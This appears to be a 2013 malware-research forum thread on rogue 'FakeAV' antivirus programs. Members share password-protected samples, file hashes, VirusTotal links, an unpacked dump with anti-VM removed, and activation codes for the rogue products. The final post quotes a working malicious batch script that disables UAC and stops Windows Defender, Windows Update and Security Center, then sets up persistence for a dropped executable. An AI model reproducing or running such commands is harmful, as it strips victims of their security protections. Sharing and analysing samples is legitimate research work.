Rogue Antimalware (FakeAV, 2013 year) - Page 8

Topic locked

Re: Rogue Antimalware (FakeAV, 2013 year)

#20096 by Win32:Virut
Sat Jul 13, 2013 6:15 pm

System Care Antivirus - 3 samples

Attachments

System Care Antivirus.7z

pass: infected
(1.15 MiB) Downloaded 113 times

Username

Win32:Virut

Posts

324

Joined

Sat Jun 02, 2012 2:22 pm

Re: Rogue Antimalware (FakeAV, 2013 year)

#20117 by ISergey256
Mon Jul 15, 2013 9:49 am

Win32:Virut wrote:8 samples
Antivirus System

Activation Code: ?O?Z?L?W?I?T?F?Q?C?N?Y?K?V?H?S?E

Username

ISergey256

Posts

32

Joined

Wed Oct 05, 2011 11:42 am

Location

Ukraine

FakeAV

#20232 by Maxstar
Sat Jul 27, 2013 7:13 am

I'm looking for the following sample.

MD5: 82c58b195fc854387e46893f32b026a6
https://www.virustotal.com/en/file/916c ... 374867056/

Thanks ;)

Malware Removal Instructions

Username

Maxstar

Posts

88

Joined

Wed Jan 26, 2011 10:20 am

Re: FakeAV

#20233 by p4r4n0id
Sat Jul 27, 2013 8:07 am

attached!

Attachments

mal.rar

pwd: infected
(474.32 KiB) Downloaded 84 times

Keep Low. Move Fast. Kill First. Die Last. One Shot. One Kill. No Luck. Pure Skill.
http://p4r4n0id.com/

Username

p4r4n0id

Posts

126

Joined

Thu Sep 22, 2011 11:36 am

Location

Israel

Contact

Re: Rogue Antimalware (FakeAV, 2013 year)

#20236 by Xylitol
Sat Jul 27, 2013 12:52 pm

http://www.bleepingcomputer.com/virus-r ... -antivirus
Due to a request here is the unpacked and with anti-vm fixed.
https://www.virustotal.com/en/file/daf1 ... 374930794/

Attachments

Dump_00A00000_00075000.dmp_fixed.zip

infected
(474.48 KiB) Downloaded 88 times

Registration Problems and FAQ - Rules For Malware Requests

Username

Xylitol

Rank

Global Moderator

Posts

1706

Joined

Sat Apr 10, 2010 5:54 pm

Location

Seireitei, Soul Society

Contact

Re: Rogue Antimalware (FakeAV, 2013 year)

#20241 by Win32:Virut
Sat Jul 27, 2013 4:10 pm

System Care Antivirus - 19 files

Attachments

System Care Antivirus.7z

(5.02 MiB) Downloaded 84 times

Username

Win32:Virut

Posts

324

Joined

Sat Jun 02, 2012 2:22 pm

Re: Rogue Antimalware (FakeAV, 2013 year)

#20256 by secObs
Sun Jul 28, 2013 7:48 pm

Internet Security

MD5: 927921207a10dfb7fd7e0684c461527d
SHA-1: ae11df6844d12147c9507d78af057de1c51d6280

Attachments

927921207a10dfb7fd7e0684c461527d.rar

pwd: infected
(793.63 KiB) Downloaded 110 times

Username

secObs

Posts

25

Joined

Sun Mar 04, 2012 10:53 pm

Location

here, there and everywhere

Contact

Re: Rogue Antimalware (FakeAV, 2013 year)

#20260 by andrew9406
Mon Jul 29, 2013 4:58 pm

Xylitol wrote:http://www.bleepingcomputer.com/virus-r ... -antivirus
Due to a request here is the unpacked and with anti-vm fixed.
https://www.virustotal.com/en/file/daf1 ... 374930794/

activation codes:
AA39754E-715219CE (seems to work with most winwebsec rogues)
AF03E-A1B69411-5E496BEE-92A70D00-1AD697F6

Username

andrew9406

Posts

7

Joined

Thu Jun 20, 2013 11:02 am

Location

Maryland, USA

Re: Rogue Antimalware (FakeAV, 2013 year)

#20334 by Cody Johnston
Thu Aug 01, 2013 8:45 pm

Attentive Antivirus

There were a few other goodies packaged with this as well

There are some other files in here as well:

1. 3X9DV7p6.exe
MD5: e7a7fb4d2c8b8d9594582618f099e337
https://www.virustotal.com/en/file/2691 ... 375387434/

2. 1891695800740633560.exe
MD5: c9d3ab7fa4d7ab64acebfa518ecb88bb
https://www.virustotal.com/en/file/2ac4 ... 375387391/

Some batch file found in the folder (Mad Skillz):

Code: Select all

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v AA2014 /t REG_SZ /d C:\ProgramData\3X9DV7p6\3X9DV7p6.exe

There are other files in the attach but those are most interesting.